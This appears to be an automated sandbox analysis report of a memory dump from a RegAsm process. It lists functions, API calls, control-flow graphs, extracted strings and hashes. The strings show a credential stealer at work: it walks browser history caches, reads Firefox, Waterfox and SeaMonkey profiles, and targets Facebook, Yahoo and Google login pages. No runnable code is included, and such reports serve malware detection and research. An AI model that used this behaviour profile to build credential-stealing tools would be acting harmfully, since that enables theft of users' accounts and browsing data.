                                          • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                          • wcschr.MSVCRT ref: 0040C324
                                          • wcschr.MSVCRT ref: 0040C344
                                          • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                          • GetLastError.KERNEL32 ref: 0040C373
                                          • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                          • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstFolderLastPathSpecial
                                          • String ID: visited:
                                          • API String ID: 2470578098-1702587658
                                          • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                          • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                          • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                          • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9
                                          Function 0040E175 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 91COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 628 40e175-40e1a1 call 40695d call 406b90 633 40e1a7-40e1e5 memset 628->633 634 40e299-40e2a8 call 4069a3 628->634 636 40e1e8-40e1fa call 406e8f 633->636 640 40e270-40e27d call 406b53 636->640 641 40e1fc-40e219 call 40dd50 * 2 636->641 640->636 647 40e283-40e286 640->647 641->640 652 40e21b-40e21d 641->652 648 40e291-40e294 call 40aa04 647->648 649 40e288-40e290 free 647->649 648->634 649->648 652->640 653 40e21f-40e235 call 40742e 652->653 653->640 656 40e237-40e242 call 40aae3 653->656 656->640 659 40e244-40e26b _snwprintf call 40a8d0 656->659 659->640
                                          APIs
                                            • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                          • memset.MSVCRT ref: 0040E1BD
                                            • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                          • free.MSVCRT ref: 0040E28B
                                            • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                            • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                            • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                          • _snwprintf.MSVCRT ref: 0040E257
                                            • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                            • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                            • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                            • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                          • String ID: $ContainerId$Container_%I64d$Containers$Name
                                          • API String ID: 2804212203-2982631422
                                          • Opcode ID: b421f0fbbd6ad79df9d48377ab98bfefffe95da864e54072a2f7617dfae47395
                                          • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                          • Opcode Fuzzy Hash: b421f0fbbd6ad79df9d48377ab98bfefffe95da864e54072a2f7617dfae47395
                                          • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99
                                          Function 0040BB98 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 145COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                            • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                            • Part of subcall function 0040CC26: CloseHandle.KERNEL32(?), ref: 0040CC98
                                            • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                          • memset.MSVCRT ref: 0040BC75
                                          • memset.MSVCRT ref: 0040BC8C
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                          • memcmp.MSVCRT ref: 0040BCD6
                                          • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
                                          • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                          • String ID:
                                          • API String ID: 115830560-3916222277
                                          • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                          • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                          • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                          • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99
                                          Function 00412465 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 88windowCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                          • String ID: r!A
                                          • API String ID: 2791114272-628097481
                                          • Opcode ID: e760b227a922d4e3f094a9eb3eb7a7fe7130a7247a75f8eef54ce2a40c46c596
                                          • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                          • Opcode Fuzzy Hash: e760b227a922d4e3f094a9eb3eb7a7fe7130a7247a75f8eef54ce2a40c46c596
                                          • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                                          Function 0040C768 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 87COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                            • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                            • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                            • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                            • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                            • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                            • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                            • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                            • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                            • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                            • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                            • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                            • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                            • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                            • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                          • _wcslwr.MSVCRT ref: 0040C817
                                            • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                            • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                          • wcslen.MSVCRT ref: 0040C82C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                          • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                          • API String ID: 2936932814-4196376884
                                          • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                          • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                          • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                          • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                          Function 0040B58D Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 770 40b58d-40b59e 771 40b5a4-40b5c0 GetModuleHandleW FindResourceW 770->771 772 40b62e-40b632 770->772 773 40b5c2-40b5ce LoadResource 771->773 774 40b5e7 771->774 773->774 775 40b5d0-40b5e5 SizeofResource LockResource 773->775 776 40b5e9-40b5eb 774->776 775->776 776->772 777 40b5ed-40b5ef 776->777 777->772 778 40b5f1-40b629 call 40afcf memcpy call 40b4d3 call 40b3c1 call 40b04b 777->778 778->772
                                          APIs
                                          • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                          • FindResourceW.KERNEL32(00000000,00000032,BIN), ref: 0040B5B6
                                          • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                          • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                          • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                          • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                          • String ID: BIN
                                          • API String ID: 1668488027-1015027815
                                          • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                          • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                          • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                          • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                          Function 00403C9C Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          • memset.MSVCRT ref: 00403CBF
                                          • memset.MSVCRT ref: 00403CD4
                                          • memset.MSVCRT ref: 00403CE9
                                          • memset.MSVCRT ref: 00403CFE
                                          • memset.MSVCRT ref: 00403D13
                                            • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                            • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                            • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                            • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                            • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                          • memset.MSVCRT ref: 00403DDA
                                            • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                            • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                          • String ID: Waterfox$Waterfox\Profiles
                                          • API String ID: 4039892925-11920434
                                          • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                          • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                          • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                          • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                          Function 00403E2D Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          • memset.MSVCRT ref: 00403E50
                                          • memset.MSVCRT ref: 00403E65
                                          • memset.MSVCRT ref: 00403E7A
                                          • memset.MSVCRT ref: 00403E8F
                                          • memset.MSVCRT ref: 00403EA4
                                            • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                            • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                            • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                            • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                            • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                          • memset.MSVCRT ref: 00403F6B
                                            • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                            • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                          • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                          • API String ID: 4039892925-2068335096
                                          • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                          • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                          • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                          • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                          Function 00403FBE Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.MSVCRT ref: 00403FE1
                                          • memset.MSVCRT ref: 00403FF6
                                          • memset.MSVCRT ref: 0040400B
                                          • memset.MSVCRT ref: 00404020
                                          • memset.MSVCRT ref: 00404035
                                            • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                            • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                            • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                            • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                            • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                          • memset.MSVCRT ref: 004040FC
                                            • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                            • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                          • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                          • API String ID: 4039892925-3369679110
                                          • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                          • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                          • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                          • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                          Function 00444432 Relevance: 10.7, APIs: 1, Strings: 6, Instructions: 217COMMON
                                          Download Yara Rule
                                          APIs
                                          • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: memcpy
                                          • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                          • API String ID: 3510742995-2641926074
                                          • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                          • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                          • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                          • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                          Function 0041837F Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 140fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateFileW.KERNEL32(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                          • GetLastError.KERNEL32 ref: 0041847E
                                          • free.MSVCRT ref: 0041848B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: CreateErrorFileLastfree
                                          • String ID: |A
                                          • API String ID: 981974120-1717621600
                                          • Opcode ID: a88df5da1066620bdf33ca4472b3118252cb96d9155fbf9def9e1204f2136f90
                                          • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                          • Opcode Fuzzy Hash: a88df5da1066620bdf33ca4472b3118252cb96d9155fbf9def9e1204f2136f90
                                          • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                                          Function 004032B4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 119COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                            • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                            • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                          • memset.MSVCRT ref: 004033B7
                                          • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                          • wcscmp.MSVCRT ref: 004033FC
                                          • _wcsicmp.MSVCRT ref: 00403439
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                          • String ID: $0.@
                                          • API String ID: 2758756878-1896041820
                                          • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                          • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                          • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                          • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                          Function 00403BED Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 57COMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.MSVCRT ref: 00403C09
                                          • memset.MSVCRT ref: 00403C1E
                                            • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                            • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                            • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                          • wcscat.MSVCRT ref: 00403C47
                                            • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                            • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                            • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                          • wcscat.MSVCRT ref: 00403C70
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: memsetwcscat$CloseFolderPathSpecialwcscpywcslen
                                          • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                          • API String ID: 1534475566-1174173950
                                          • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                          • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                          • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                          • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                          Function 0040A804 Relevance: 9.0, APIs: 6, Instructions: 40libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                          • String ID:
                                          • API String ID: 669240632-0
                                          • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                          • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                          • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                          • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                          Function 00414C2E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 77registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                          • memset.MSVCRT ref: 00414C87
                                          • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                          • wcscpy.MSVCRT ref: 00414CFC
                                            • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                          Strings
                                          • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: CloseFolderPathSpecialVersionmemsetwcscpy
                                          • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                          • API String ID: 2925649097-2036018995
                                          • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                          • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                          • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                          • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                          Function 0041443E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON
                                          Download Yara Rule
                                          APIs
                                          • wcschr.MSVCRT ref: 00414458
                                          • _snwprintf.MSVCRT ref: 0041447D
                                          • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                          • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: PrivateProfileString$Write_snwprintfwcschr
                                          • String ID: "%s"
                                          • API String ID: 1343145685-3297466227
                                          • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                          • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                          • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                          • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                          Function 004087B3 Relevance: 7.7, APIs: 6, Instructions: 190COMMON
